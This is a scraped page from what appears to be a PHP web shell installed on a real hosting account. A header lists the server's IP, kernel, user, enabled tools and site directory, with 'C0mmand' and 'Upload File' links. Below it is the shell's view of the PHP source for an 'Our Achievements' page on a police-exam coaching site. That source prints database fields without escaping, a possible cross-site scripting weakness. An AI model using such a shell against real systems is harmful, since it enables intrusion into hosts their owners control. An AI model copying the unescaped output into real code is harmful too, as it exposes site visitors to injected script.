Server IP : 103.53.40.154 / Your IP : 3.21.248.105 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/bethepolice.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Our Achievements</title> <meta name="description" content="Bethepolice"> <?php include "top-links.php";?> </head> <body> <!--header --> <?php include "header.php";?> <section class="inner-header divider layer-overlay overlay-dark-6" data-bg-img="img/breadcrumbs.jpg" style="background-image: url('img/breadcrumbs.jpg'); background-position: center; background-size: cover;"> <div class="container pt-120 pb-60"> <div class="section-content"> <div class="row"> <div class="col-md-6 p-4"> <h2 class="text-theme-colored2 font-36">Our Achievements</h2> <ol class="breadcrumb text-left mt-10 white"> <li><a href="">Home </a></li> <span> | </span> <li class="active"><a href="<?= $wspath?>our-achievenments.php"> Our Achievements</a></li> </ol> </div> </div> </div> </div> </section> <!--marquee --> <?php include "home-marquee.php";?> <div class="container"> <h2>Our Achievements</h2> <div class="row py-2"> <?php $sqlnews = "SELECT * FROM tbl_blog WHERE blog_status='Active' AND pages='Achievements' ORDER BY `b_id` DESC"; $runnews = mysqli_query($db,$sqlnews) or die("Query Not run"); $count=0; while($datanews = mysqli_fetch_assoc($runnews)){ if(mysqli_num_rows($runnews) > 0){ $count++; $dateString=$datanews['date']; $timestamp = strtotime($dateString); $formattedDate = date("d-M-Y", $timestamp); ?> <div class="col-lg-4"> <div class="card" style="box-shadow: 0 19px 38px rgba(0,0,0,0.30), 0 15px 12px rgba(0,0,0,0.22); margin-bottom:10px;"> <img src="<?php echo $wspath;?>admin/images/property-image/<?php echo $datanews['image'];?>" class="img-fluid rounded-start w-100" style="height:200px;" alt="<?php echo $datanews['title'];?>"> <hr> <div class="card-body"> <div class="news-details"> <ul> <li> <i class="fa-solid fa-user"></i> Admin </li> <li> <i class="fa-solid fa-calendar-days"></i> <?php echo $datanews['date'];?> </li> </ul> </div> <h5 class="card-title"><?php echo $datanews['title'];?></h5> <p class="card-text"><?php echo substr($datanews['short_description'],0,100);?> ...<a href="<?php echo $wspath ?>detail<?php echo $datanews['slug_link']?>.html">read more</a></p> </div> </div> </div> <?php } } ?> <!--<div class="col-lg-3">--> <!-- <div class="card" >--> <!-- <img src="..." class="card-img-top" alt="...">--> <!-- <div class="card-body">--> <!-- <h5 class="card-title">Card title</h5>--> <!-- <p class="card-text">Some quick example text to build on the card title and make up the bulk of the card's content.</p>--> <!-- <a href="#" class="btn btn-primary">Go somewhere</a>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!--<div class="col-lg-3">--> <!-- <div class="card" >--> <!-- <img src="..." class="card-img-top" alt="...">--> <!-- <div class="card-body">--> <!-- <h5 class="card-title">Card title</h5>--> <!-- <p class="card-text">Some quick example text to build on the card title and make up the bulk of the card's content.</p>--> <!-- <a href="#" class="btn btn-primary">Go somewhere</a>--> <!-- </div>--> <!-- </div>--> <!--</div>--> <!--<div class="col-lg-3">--> <!-- <div class="card" >--> <!-- <img src="..." class="card-img-top" alt="...">--> <!-- <div class="card-body">--> <!-- <h5 class="card-title">Card title</h5>--> <!-- <p class="card-text">Some quick example text to build on the card title and make up the bulk of the card's content.</p>--> <!-- <a href="#" class="btn btn-primary">Go somewhere</a>--> <!-- </div>--> <!-- </div>--> <!--</div>--> </div> </div> <!--footer --> <?php include "footer.php";?> </body> </html>